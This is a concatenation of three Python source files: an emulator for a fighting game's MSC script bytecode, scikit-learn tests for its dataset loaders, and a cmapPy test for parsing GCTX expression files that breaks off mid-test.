print("WARNING: OOB POP UNHANDLED BY EMU, RETURNING 0")
print(" this will cause inaccuracy in emulation")
return 0
if value == None:
print("WARNING: POPPED UNINITIALIZED VALUE, ASSUMING 0")
return 0
else:
return value
def getVar(varType, varNum):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if varType == 0: #(Local)
if localVarPos + varNum == 0x80:
return stackPos
elif localVarPos + varNum < 0x80:
return stack[localVarPos+varNum]
else:
print("WARNING: OOB READ OF LOCAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, TO AVOID")
print(" ERRORS ASSUMING VALUE OF 0, THIS WILL")
print(" LIKELY BE INACCURATE TO ON CONSOLE BEHAIVIOR")
return 0
elif varType == 1: #(global variable)
if varNum < 0x8A:
return globalVars[varNum]
elif varNum >= 0x8A and varNum < 0x10A:
return stack[varNum - 0x8A]
elif varNum == 0x10A:
return stackPos
elif varNum > 0x10A:
print("WARNING: OOB READ OF GLOBAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, TO AVOID")
print(" ERRORS ASSUMING VALUE OF 0, THIS WILL")
print(" LIKELY BE INACCURATE TO ON CONSOLE BEHAIVIOR")
return 0
else:
print("ERROR: UNKNOWN VARIABLE TYPE %i AT LOCATION %X" % (varType, evalPos))
raise ValueError
def setVar(varType, varNum, value, pushBit):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if varType == 0: #(Local)
if localVarPos + varNum == 0x80:
stackPos = value
elif localVarPos + varNum < 0x80:
stack[localVarPos+varNum] = value
else:
print("WARNING: OOB WRITE OF LOCAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, THIS WRITE")
print(" WILL NOT HAVE HAPPENED MORE OR LESS")
elif varType == 1: #(global variable)
if varNum < 0x8A:
globalVars[varNum] = value
elif varNum >= 0x8A and varNum < 0x10A:
stack[varNum - 0x8A] = value
elif varNum == 0x10A:
stackPos = value
elif varNum > 0x10A:
print("WARNING: OOB READ OF GLOBAL VAR %i AT LOCATION %X" % (varNum, evalPos))
print(" IS UNMAPPED IN EMULATOR MEMORY, THIS WRITE")
print(" WILL NOT HAVE HAPPENED MORE OR LESS")
else:
print("ERROR: UNKNOWN VARIABLE TYPE %i AT LOCATION %X" % (varType, evalPos))
raise ValueError
if pushBit:
push(value)
#Converts an int representing bytes to a float
#Example 0x3F800000 -> 1.0
def intToFloat(val):
return struct.unpack('>f', struct.pack('>L', val))[0]
#Converts a float to an int representing bytes
#Example 1.0 -> 0x3F800000
def floatToInt(val):
return struct.unpack('>L', struct.pack('>f', val))[0]
def printf(printString, args):
specifierLocs = [i for i,j in enumerate(printString) if j == '%' and i < len(printString) and printString[i+1] in ['x', 'X', 'i', 'f', '0']]
for i,j in enumerate(specifierLocs):
if printString[j+1] == 'f':
args[i] = intToFloat(args[i])
print(printString % tuple(args))
def evalCommand(command):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if command == None or command.command == 0xFFFE:
if evalPos != None:
print("Error: Invalid command at %X" % evalPos)
quit()
else:
print("Error: Invalid command (And Invalid eval position)")
executing = False
return
#This is used for determining if to add command size to
isJump = False
c = command.command
cParams = command.parameters
pushBit = command.pushBit
if c == 0x0: #nop
pass
elif c == 0x1:
pass
elif c == 0x2: #begin
stackPos -= cParams[0]
functionStack.append(FunctionInfo(localVarPos, linkRegister, stackPos))
localVarPos = stackPos
stackPos += cParams[1]
elif c in [0x3, 0x6, 0x7, 0x8, 0x9]: #end or return
if len(functionStack) == 0:
executing = False
return
fInfo = functionStack.pop()
if fInfo.returnAddress == None:
executing = False
return
if c in [0x6, 0x8]: #return a value
v = pop()
stackPos = fInfo.stackPos
push(v)
localVarPos = fInfo.localVarPos
evalPos = fInfo.returnAddress
isJump = True
elif c in [0x4, 0x5, 0x36]:
isJump = True
evalPos = cParams[0]
elif c == 0xA or c == 0xD:
push(cParams[0], pushBit)
elif c == 0xB:
push(getVar(cParams[0], cParams[1]), pushBit)
elif c == 0xC:
pass
elif c == 0xE:
push(pop() + pop(), pushBit) #Add int
elif c == 0xF:
push((-pop()) + pop(), pushBit) #Subtract int
elif c == 0x10:
push(pop() * pop(), pushBit) #Multiply int
elif c == 0x11:
divideBy = pop()
push(pop() // divideBy, pushBit) #Divide int
elif c == 0x12:
divideBy = pop()
push(pop() % divideBy, pushBit) #Mod int
elif c == 0x13:
push(-pop(), pushBit) #Negate value
elif c == 0x14:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) + 1,pushBit) #Var++
elif c == 0x15:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) - 1,pushBit) #Var--
elif c == 0x16:
push(pop() & pop(), pushBit)#bitAnd
elif c == 0x17:
push(pop() | pop(), pushBit)#bitOr
elif c == 0x18:
push(pop() ^ 0xFFFFFFFF, pushBit)#bitNot
elif c == 0x19:
push(pop() ^ pop(), pushBit)#bitXor
elif c == 0x1A:
shiftBy = pop() #leftShift
push(pop() << shiftBy, pushBit)
elif c == 0x1B:
shiftBy = pop()
push(pop() >> shiftBy, pushBit)#rightShift
elif c == 0x1C:
setVar(cParams[0], cParams[1], pop(),pushBit) #setVar
elif c == 0x1D:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) + pop(),pushBit) #Var +=
elif c == 0x1E:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) - pop(),pushBit) #Var -=
elif c == 0x1F:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) * pop(),pushBit) #Var *=
elif c == 0x20:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) // pop(),pushBit) #Var /=
elif c == 0x21:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) % pop(),pushBit) #Var %=
elif c == 0x22:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) & pop(),pushBit) #Var &=
elif c == 0x23:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) | pop(),pushBit) #Var |=
elif c == 0x24:
setVar(cParams[0], cParams[1], getVar(cParams[0], cParams[1]) ^ pop(),pushBit) #Var ^=
elif c == 0x25:
push(int(pop() == pop()), pushBit) #equals
elif c == 0x26:
push(int(pop() != pop()), pushBit) #not equals
elif c == 0x27:
compareTo = pop()
push(int(pop() < compareTo), pushBit) #less than
elif c == 0x28:
compareTo = pop()
push(int(pop() <= compareTo), pushBit) #less than or equal
elif c == 0x29:
compareTo = pop()
push(int(pop() > compareTo), pushBit) #greater than
elif c == 0x2A:
compareTo = pop()
push(int(pop() >= compareTo), pushBit) #greater than or equal to
elif c == 0x2B:
push(0 if pop() != 0 else 1, pushBit)#logic not
elif c == 0x2C:
formatString = strings[pop()]
formatValues = []
for i in range(cParams[0]-1):
formatValues.insert(0, pop())
printf(formatString, formatValues)
elif c == 0x2D:
args = []
for i in range(cParams[0]):
args.insert(0, pop())
syscall(cParams[1], args, pushBit)
elif c == 0x2E:
exceptionRegister = cParams[0]
elif c in [0x2F, 0x30, 0x31]:
isJump = True
jumpPos = pop()
#paramList = [pop() for i in range(cParams[0])]
hitException = False
if c == 0x2F:
gottenScript = mscFile.getScriptAtLocation(jumpPos)
if gottenScript == None or gottenScript.getCommand(jumpPos).command != 0x2:
print("WARNING: at %X invalid function call, jumping to exception register (%X)" % (evalPos, exceptionRegister))
evalPos = exceptionRegister
hitException = True
isJump = True
if not hitException:
isJump = True
linkRegister = evalPos + len(command)
evalPos = jumpPos
elif c == 0x32:
v = pop()
push(v) #push, the essentially pushes the last return value
push(v)
push(v,pushBit)
elif c == 0x33:
push(pop(), pushBit)
elif c == 0x34:
if pop() == 0:
isJump = True
evalPos = cParams[0]
elif c == 0x35:
if pop() != 0:
isJump = True
evalPos = cParams[0]
elif c == 0x38:
convertToFloat = lambda i: floatToInt(float(i))
stack[stackPos - (1 + cParams[0])] = convertToFloat(stack[stackPos - (1 + cParams[0])]) # intToFloat
elif c == 0x39:
convertToInt = lambda f: int(intToFloat(f))
stack[stackPos - (1 + cParams[0])] = convertToInt(stack[stackPos - (1 + cParams[0])]) # floatToInt
elif c == 0x3A:
push(intToFloat(pop()) + intToFloat(pop()), pushBit)
elif c == 0x3B:
v = intToFloat(pop())
push(intToFloat(pop()) - v, pushBit)
elif c == 0x3C:
push(intToFloat(pop()) * intToFloat(pop()), pushBit)
elif c == 0x3D:
v = intToFloat(pop())
push(intToFloat(pop()) / v, pushBit)
elif c == 0x3E:
push(-intToFloat(pop()), pushBit)
elif c == 0x3F:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) + 1),pushBit) #float Var++
elif c == 0x40:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) - 1),pushBit) #float Var--
elif c == 0x41:
setVar(cParams[0], cParams[1], pop(), pushBit) #setFloatVar
elif c == 0x42:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) + intToFloat(pop())),pushBit) #float Var+=
elif c == 0x43:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) - intToFloat(pop())),pushBit) #float Var-=
elif c == 0x44:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) * intToFloat(pop())),pushBit) #float Var*=
elif c == 0x45:
setVar(cParams[0], cParams[1], floatToInt(intToFloat(getVar(cParams[0], cParams[1])) / intToFloat(pop())),pushBit) #float Var/=
elif c == 0x46:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) == compTo), pushBit)
elif c == 0x47:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) != compTo), pushBit)
elif c == 0x48:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) < compTo), pushBit)
elif c == 0x49:
push(int(intToFloat(pop()) <= intToFloat(pop())), pushBit) #float equals
elif c == 0x4A:
push(int(intToFloat(pop()) > intToFloat(pop())), pushBit) #float equals
elif c == 0x4B:
compTo = intToFloat(pop())
push(int(intToFloat(pop()) >= compTo), pushBit)
elif c == 0x4D:
executing = False
return
if not isJump:
evalPos += len(command)
def evalMscFile(mscFileObject):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister,mainLoopFunc
mscFile = mscFileObject
strings = mscFile.strings
evalPos = mscFile.entryPoint
startScript = mscFile.getScriptAtLocation(mscFile.entryPoint)
if startScript != None:
executing = True
while executing:
currentExecutingScript = mscFile.getScriptAtLocation(evalPos)
if currentExecutingScript != None:
evalCommand(currentExecutingScript.getCommand(evalPos))
if executing:
executing = (evalPos != None)
else:
executing = False
def evalFile(filepath):
with open(filepath, 'rb') as f:
mscFile = MscFile().readFromFile(f)
evalMscFile(mscFile)
def evalText():
global stack, stackPos
mscFile = MscFile()
strs = []
scriptString = ""
print("+----------------------------------------------+")
print("| Text interpreter - Type in your script. |")
print("| Script input will stop after you type 'end' |")
print("+----------------------------------------------+")
nextLine = input()
while nextLine.strip().lower() != "end":
scriptString += nextLine + "\n"
nextLine = input()
scriptString += nextLine
print("------------------------------------------------")
scr = MscScript()
cmds = parseCommands(scriptString, mscStrings=strs)
cmdsSize = 0
for c in cmds:
cmdsSize += len(c)
scr.bounds = [0x10, 0x10+cmdsSize]
scr.cmds = cmds
scr.setStart(0x10)
scr.offset(0x10)
mscFile.entryPoint = 0x10
mscFile.strings = strs
mscFile.scripts.append(scr)
if scr[0].command == 0x2 and scr[0].parameters[0] > 0:
stackPos = scr[0].parameters[0]
print('Input %i parameter(s)' % scr[0].parameters[0])
for i in range(scr[0].parameters[0]):
p = input('Input parameter %i: ' % i).strip()
if p[-1] == 'f':
stack[i] = int(floatToInt(float(p[0 : len(p)-1])))
else:
stack[i] = int(p, 0)
evalMscFile(mscFile)
def load_fighter_param_common(filepath):
global sharedVars
p = openParam(filepath)
for i in range(len(p)):
val = p[i]
if isinstance(val, f32):
val = floatToInt(val)
elif not True in [isinstance(val, t) for t in [u8, s8, u16, s16, u32, s32]]:
continue
sharedVars[0x12000000 + i] = int(val)
sharedVars[0x02000000 + i] = int(val)
def load_fighter_param(filepath, entry):
global sharedVars
p = openParam(filepath)[0].entry(entry)
for i in range(len(p)):
val = p[i]
if isinstance(val, f32):
val = floatToInt(val)
elif not True in [isinstance(val, t) for t in [u8, s8, u16, s16, u32, s32]]:
continue
sharedVars[0x13000000 + i] = int(val)
sharedVars[0x03000000 + i] = int(val)
def main():
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister,sharedVars,mainLoopFunc
mscFile = None
mscFileBytes = None
mainLoopFunc = None
stack = [None] * 0x80
functionStack = []
stackPos = 0
localVarPos = 0
evalPos = 0
exceptionRegister = 0
linkRegister = None
globalVars = [None] * 0x8A #Note a lot of this is actually unused but is simulated for exploitation
executing = False
strings = []
sharedVars = {}
#Parse arguments
parse = ArgumentParser(description="Emulate MSC bytecode")
parse.add_argument("--fighter_param_common", action="store", dest="fighter_param_common", help="Path of fighter_param_common to load")
parse.add_argument("--fighter_param", action="store", dest="fighter_param", help="Path of fighter_param to load")
parse.add_argument("--character", action="store", dest="character", help="Name of character to load from fighter_param")
parse.add_argument("--character_list", action="store_true", dest="charLS", help="List character names")
parse.add_argument("mscFile", nargs='?', type=str, help="MSC File to emulate")
args = parse.parse_args()
charIds = {'miienemyf': 62, 'miienemys': 63, 'miienemyg': 64, 'littlemacg': 60, 'mariod': 36, 'pikmin': 26, 'sheik': 17, 'roy': 54, 'yoshi': 7, 'duckhunt': 45, 'koopajr': 46, 'pit': 24, 'metaknight': 23, 'cloud': 55, 'miifighter': 0, 'miiswordsman': 1, 'miigunner': 2, 'wiifit': 40, 'pacman': 49, 'gamewatch': 19, 'peach': 14, 'robot': 31, 'rockman': 50, 'fox': 9, 'zelda': 16, 'bayonetta': 56, 'purin': 35, 'donkey': 4, 'shulk': 47, 'ryu': 52, 'toonlink': 32, 'sonic': 34, 'lucariom': 61, 'lizardon': 33, 'littlemac': 41, 'kirby': 8, 'pikachu': 10, 'murabito': 42, 'ness': 13, 'palutena': 43, 'diddy': 27, 'mario': 3, 'wario': 22, 'link': 5, 'ike': 29, 'rosetta': 39, 'samus': 6, 'falcon': 12, 'mewtwo': 51, 'lucas': 53, 'ganon': 20, 'koopag': 58, 'gekkouga': 48, 'dedede': 28, 'pitb': 38, 'lucina': 37, 'warioman': 59, 'marth': 18, 'szerosuit': 25, 'koopa': 15, 'kamui': 57, 'lucario': 30, 'luigi': 11, 'reflet': 44, 'falco': 21}
if args.charLS:
print(list(charIds.keys()))
quit()
if args.fighter_param != None and isfile(args.fighter_param) and args.character in charIds:
print("loading fighter_param")
load_fighter_param(args.fighter_param, charIds[args.character])
if args.fighter_param_common != None and isfile(args.fighter_param_common):
load_fighter_param_common(args.fighter_param_common)
if args.mscFile == None:
evalText()
else:
evalFile(args.mscFile)
if __name__ == '__main__':
main()
|
|
import os
import shutil
import tempfile
import warnings
import numpy
from pickle import loads
from pickle import dumps
from functools import partial
from sklearn.datasets import get_data_home
from sklearn.datasets import clear_data_home
from sklearn.datasets import load_files
from sklearn.datasets import load_sample_images
from sklearn.datasets import load_sample_image
from sklearn.datasets import load_digits
from sklearn.datasets import load_diabetes
from sklearn.datasets import load_linnerud
from sklearn.datasets import load_iris
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import load_boston
from sklearn.datasets import load_wine
from sklearn.datasets.base import Bunch
from sklearn.datasets.tests.test_common import check_return_X_y
from sklearn.externals.six import b, u
from sklearn.externals._pilutil import pillow_installed
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raises
DATA_HOME = tempfile.mkdtemp(prefix="scikit_learn_data_home_test_")
LOAD_FILES_ROOT = tempfile.mkdtemp(prefix="scikit_learn_load_files_test_")
TEST_CATEGORY_DIR1 = ""
TEST_CATEGORY_DIR2 = ""
def _remove_dir(path):
if os.path.isdir(path):
shutil.rmtree(path)
def teardown_module():
"""Test fixture (clean up) run once after all tests of this module"""
for path in [DATA_HOME, LOAD_FILES_ROOT]:
_remove_dir(path)
def setup_load_files():
global TEST_CATEGORY_DIR1
global TEST_CATEGORY_DIR2
TEST_CATEGORY_DIR1 = tempfile.mkdtemp(dir=LOAD_FILES_ROOT)
TEST_CATEGORY_DIR2 = tempfile.mkdtemp(dir=LOAD_FILES_ROOT)
sample_file = tempfile.NamedTemporaryFile(dir=TEST_CATEGORY_DIR1,
delete=False)
sample_file.write(b("Hello World!\n"))
sample_file.close()
def teardown_load_files():
_remove_dir(TEST_CATEGORY_DIR1)
_remove_dir(TEST_CATEGORY_DIR2)
def test_data_home():
# get_data_home will point to a pre-existing folder
data_home = get_data_home(data_home=DATA_HOME)
assert_equal(data_home, DATA_HOME)
assert_true(os.path.exists(data_home))
# clear_data_home will delete both the content and the folder it-self
clear_data_home(data_home=data_home)
assert_false(os.path.exists(data_home))
# if the folder is missing it will be created again
data_home = get_data_home(data_home=DATA_HOME)
assert_true(os.path.exists(data_home))
def test_default_empty_load_files():
res = load_files(LOAD_FILES_ROOT)
assert_equal(len(res.filenames), 0)
assert_equal(len(res.target_names), 0)
assert_equal(res.DESCR, None)
def test_default_load_files():
try:
setup_load_files()
res = load_files(LOAD_FILES_ROOT)
assert_equal(len(res.filenames), 1)
assert_equal(len(res.target_names), 2)
assert_equal(res.DESCR, None)
assert_equal(res.data, [b("Hello World!\n")])
finally:
teardown_load_files()
def test_load_files_w_categories_desc_and_encoding():
try:
setup_load_files()
category = os.path.abspath(TEST_CATEGORY_DIR1).split('/').pop()
res = load_files(LOAD_FILES_ROOT, description="test",
categories=category, encoding="utf-8")
assert_equal(len(res.filenames), 1)
assert_equal(len(res.target_names), 1)
assert_equal(res.DESCR, "test")
assert_equal(res.data, [u("Hello World!\n")])
finally:
teardown_load_files()
def test_load_files_wo_load_content():
try:
setup_load_files()
res = load_files(LOAD_FILES_ROOT, load_content=False)
assert_equal(len(res.filenames), 1)
assert_equal(len(res.target_names), 2)
assert_equal(res.DESCR, None)
assert_equal(res.get('data'), None)
finally:
teardown_load_files()
def test_load_sample_images():
try:
res = load_sample_images()
assert_equal(len(res.images), 2)
assert_equal(len(res.filenames), 2)
assert_true(res.DESCR)
except ImportError:
warnings.warn("Could not load sample images, PIL is not available.")
def test_load_digits():
digits = load_digits()
assert_equal(digits.data.shape, (1797, 64))
assert_equal(numpy.unique(digits.target).size, 10)
# test return_X_y option
check_return_X_y(digits, partial(load_digits))
def test_load_digits_n_class_lt_10():
digits = load_digits(9)
assert_equal(digits.data.shape, (1617, 64))
assert_equal(numpy.unique(digits.target).size, 9)
def test_load_sample_image():
try:
china = load_sample_image('china.jpg')
assert_equal(china.dtype, 'uint8')
assert_equal(china.shape, (427, 640, 3))
except ImportError:
warnings.warn("Could not load sample images, PIL is not available.")
def test_load_missing_sample_image_error():
if pillow_installed:
assert_raises(AttributeError, load_sample_image,
'blop.jpg')
else:
warnings.warn("Could not load sample images, PIL is not available.")
def test_load_diabetes():
res = load_diabetes()
assert_equal(res.data.shape, (442, 10))
assert_true(res.target.size, 442)
assert_equal(len(res.feature_names), 10)
assert_true(res.DESCR)
# test return_X_y option
check_return_X_y(res, partial(load_diabetes))
def test_load_linnerud():
res = load_linnerud()
assert_equal(res.data.shape, (20, 3))
assert_equal(res.target.shape, (20, 3))
assert_equal(len(res.target_names), 3)
assert_true(res.DESCR)
assert_true(os.path.exists(res.data_filename))
assert_true(os.path.exists(res.target_filename))
# test return_X_y option
check_return_X_y(res, partial(load_linnerud))
def test_load_iris():
res = load_iris()
assert_equal(res.data.shape, (150, 4))
assert_equal(res.target.size, 150)
assert_equal(res.target_names.size, 3)
assert_true(res.DESCR)
assert_true(os.path.exists(res.filename))
# test return_X_y option
check_return_X_y(res, partial(load_iris))
def test_load_wine():
res = load_wine()
assert_equal(res.data.shape, (178, 13))
assert_equal(res.target.size, 178)
assert_equal(res.target_names.size, 3)
assert_true(res.DESCR)
# test return_X_y option
check_return_X_y(res, partial(load_wine))
def test_load_breast_cancer():
res = load_breast_cancer()
assert_equal(res.data.shape, (569, 30))
assert_equal(res.target.size, 569)
assert_equal(res.target_names.size, 2)
assert_true(res.DESCR)
assert_true(os.path.exists(res.filename))
# test return_X_y option
check_return_X_y(res, partial(load_breast_cancer))
def test_load_boston():
res = load_boston()
assert_equal(res.data.shape, (506, 13))
assert_equal(res.target.size, 506)
assert_equal(res.feature_names.size, 13)
assert_true(res.DESCR)
assert_true(os.path.exists(res.filename))
# test return_X_y option
check_return_X_y(res, partial(load_boston))
def test_loads_dumps_bunch():
bunch = Bunch(x="x")
bunch_from_pkl = loads(dumps(bunch))
bunch_from_pkl.x = "y"
assert_equal(bunch_from_pkl['x'], bunch_from_pkl.x)
def test_bunch_pickle_generated_with_0_16_and_read_with_0_17():
bunch = Bunch(key='original')
# This reproduces a problem when Bunch pickles have been created
# with scikit-learn 0.16 and are read with 0.17. Basically there
# is a surprising behaviour because reading bunch.key uses
# bunch.__dict__ (which is non empty for 0.16 Bunch objects)
# whereas assigning into bunch.key uses bunch.__setattr__. See
# https://github.com/scikit-learn/scikit-learn/issues/6196 for
# more details
bunch.__dict__['key'] = 'set from __dict__'
bunch_from_pkl = loads(dumps(bunch))
# After loading from pickle the __dict__ should have been ignored
assert_equal(bunch_from_pkl.key, 'original')
assert_equal(bunch_from_pkl['key'], 'original')
# Making sure that changing the attr does change the value
# associated with __getitem__ as well
bunch_from_pkl.key = 'changed'
assert_equal(bunch_from_pkl.key, 'changed')
assert_equal(bunch_from_pkl['key'], 'changed')
def test_bunch_dir():
# check that dir (important for autocomplete) shows attributes
data = load_iris()
assert_true("data" in dir(data))
|
|
import logging
import unittest
import os
import pandas as pd
import numpy as np
import h5py
import pandas.util.testing as pandas_testing
import cmapPy.pandasGEXpress.setup_GCToo_logger as setup_logger
import cmapPy.pandasGEXpress.GCToo as GCToo
import cmapPy.pandasGEXpress.parse_gctx as parse_gctx
import cmapPy.pandasGEXpress.mini_gctoo_for_testing as mini_gctoo_for_testing
import cmapPy.pandasGEXpress.subset_gctoo as subset_gctoo
import cmapPy.pandasGEXpress.write_gctx as write_gctx
__author__ = "Oana Enache"
__email__ = "[email protected]"
FUNCTIONAL_TESTS_PATH = "../functional_tests"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
version_node = "version"
rid_node = "/0/META/ROW/id"
cid_node = "/0/META/COL/id"
data_node = "/0/DATA/0/matrix"
row_meta_group_node = "/0/META/ROW"
col_meta_group_node = "/0/META/COL"
class MockHdf5Dset(object):
def __init__(self, data_list, dtype):
self.data_list = data_list
self.shape = (len(data_list),)
self.dtype = dtype
def read_direct(self, dest):
for i in range(len(dest)):
dest[i] = self.data_list[i]
class TestParseGctx(unittest.TestCase):
def test_parse(self):
# parse whole thing
mg1 = mini_gctoo_for_testing.make()
mg2 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx")
pandas_testing.assert_frame_equal(mg1.data_df, mg2.data_df)
pandas_testing.assert_frame_equal(mg1.row_metadata_df, mg2.row_metadata_df)
pandas_testing.assert_frame_equal(mg1.col_metadata_df, mg2.col_metadata_df)
# test with string rid/cid
test_rids = ['LJP007_MCF10A_24H:TRT_CP:BRD-K93918653:3.33', 'LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666']
test_cids = ['LJP007_MCF7_24H:TRT_POSCON:BRD-A61304759:10']
mg3 = subset_gctoo.subset_gctoo(mg1, rid=test_rids, cid=test_cids)
mg4 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",
rid=test_rids, cid=test_cids)
pandas_testing.assert_frame_equal(mg3.data_df, mg4.data_df)
pandas_testing.assert_frame_equal(mg3.row_metadata_df, mg4.row_metadata_df)
pandas_testing.assert_frame_equal(mg3.col_metadata_df, mg4.col_metadata_df)
# first, make & write out temp version of mini_gctoo with int rids/cids
new_mg = mini_gctoo_for_testing.make(convert_neg_666=False)
int_indexed_data_df = new_mg.data_df.copy()
int_indexed_data_df.index = [str(i) for i in range(0, 6)]
int_indexed_data_df.columns = [str(i) for i in range(10, 16)]
int_indexed_row_meta = new_mg.row_metadata_df.copy()
int_indexed_row_meta.index = int_indexed_data_df.index
int_indexed_col_meta = new_mg.col_metadata_df.copy()
int_indexed_col_meta.index = int_indexed_data_df.columns
int_indexed_gctoo = GCToo.GCToo(data_df=int_indexed_data_df, row_metadata_df=int_indexed_row_meta,
col_metadata_df=int_indexed_col_meta)
write_gctx.write(int_indexed_gctoo, "int_indexed_mini_gctoo.gctx")
# test with numeric (repr as string) rid/cid
mg5 = GCToo.GCToo(data_df=int_indexed_data_df, row_metadata_df=int_indexed_row_meta,
col_metadata_df=int_indexed_col_meta)
mg5 = subset_gctoo.subset_gctoo(mg5, row_bool=[True, False, True, False, True, False],
col_bool=[True, False, False, True, True, True])
mg5.data_df.index.name = "rid"
mg5.data_df.columns.name = "cid"
mg5.row_metadata_df.index.name = "rid"
mg5.row_metadata_df.columns.name = "rhd"
mg5.col_metadata_df.index.name = "cid"
mg5.col_metadata_df.columns.name = "chd"
mg6 = parse_gctx.parse("int_indexed_mini_gctoo.gctx", rid=["0", "2", "4"],
cid=["10", "13", "14", "15"], convert_neg_666=False)
os.remove("int_indexed_mini_gctoo.gctx")
pandas_testing.assert_frame_equal(mg5.data_df, mg6.data_df)
pandas_testing.assert_frame_equal(mg5.row_metadata_df, mg6.row_metadata_df)
pandas_testing.assert_frame_equal(mg5.col_metadata_df, mg6.col_metadata_df)
# test with ridx/cidx
mg7 = subset_gctoo.subset_gctoo(mg1, rid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'],
cid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'])
mg8 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", ridx=[4], cidx=[4])
pandas_testing.assert_frame_equal(mg7.data_df, mg8.data_df)
pandas_testing.assert_frame_equal(mg7.row_metadata_df, mg8.row_metadata_df)
pandas_testing.assert_frame_equal(mg7.col_metadata_df, mg8.col_metadata_df)
# test with rid/cidx
mg9 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",
rid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'],
cidx=[4])
pandas_testing.assert_frame_equal(mg7.data_df, mg9.data_df)
pandas_testing.assert_frame_equal(mg7.row_metadata_df, mg9.row_metadata_df)
pandas_testing.assert_frame_equal(mg7.col_metadata_df, mg9.col_metadata_df)
# test with ridx/cid
mg10 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", ridx=[4],
cid=['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'])
pandas_testing.assert_frame_equal(mg7.data_df, mg10.data_df)
pandas_testing.assert_frame_equal(mg7.row_metadata_df, mg10.row_metadata_df)
pandas_testing.assert_frame_equal(mg7.col_metadata_df, mg10.col_metadata_df)
# test with row_meta_only
mg11 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", row_meta_only=True)
pandas_testing.assert_frame_equal(mg11, mg1.row_metadata_df)
# test with col_meta_only
mg12 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", col_meta_only=True)
pandas_testing.assert_frame_equal(mg12, mg1.col_metadata_df)
# test with sort_row_meta False and ridx
mg13 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",)
# test with sort_col_meta False and cidx
mg13 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
cidx = [4,1,3], sort_col_meta= False)
pandas_testing.assert_frame_equal(mg13.data_df, mg1.data_df.iloc[:, [4,1,3]])
pandas_testing.assert_frame_equal(mg13.col_metadata_df, mg1.col_metadata_df.iloc[[4,1,3],:])
pandas_testing.assert_frame_equal(mg13.row_metadata_df, mg1.row_metadata_df)
# test with sort_row_meta False and ridx
mg14 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
ridx = [3,0,1], sort_row_meta= False)
pandas_testing.assert_frame_equal(mg14.data_df, mg1.data_df.iloc[[3,0,1],:])
pandas_testing.assert_frame_equal(mg14.col_metadata_df, mg1.col_metadata_df)
pandas_testing.assert_frame_equal(mg14.row_metadata_df, mg1.row_metadata_df.iloc[[3,0,1],:])
# test with sort_col_meta False and cidx and col_meta_only
mg15 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
cidx = [4,1,3], sort_col_meta= False, col_meta_only=True)
pandas_testing.assert_frame_equal(mg15, mg1.col_metadata_df.iloc[[4,1,3],:])
# test with sort_row_meta False and ridx and row_meta_only
mg16 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
ridx = [3,0,1], sort_row_meta= False, row_meta_only=True)
pandas_testing.assert_frame_equal(mg16, mg1.row_metadata_df.iloc[[3,0,1],:])
# test with sort_col_meta False and cid
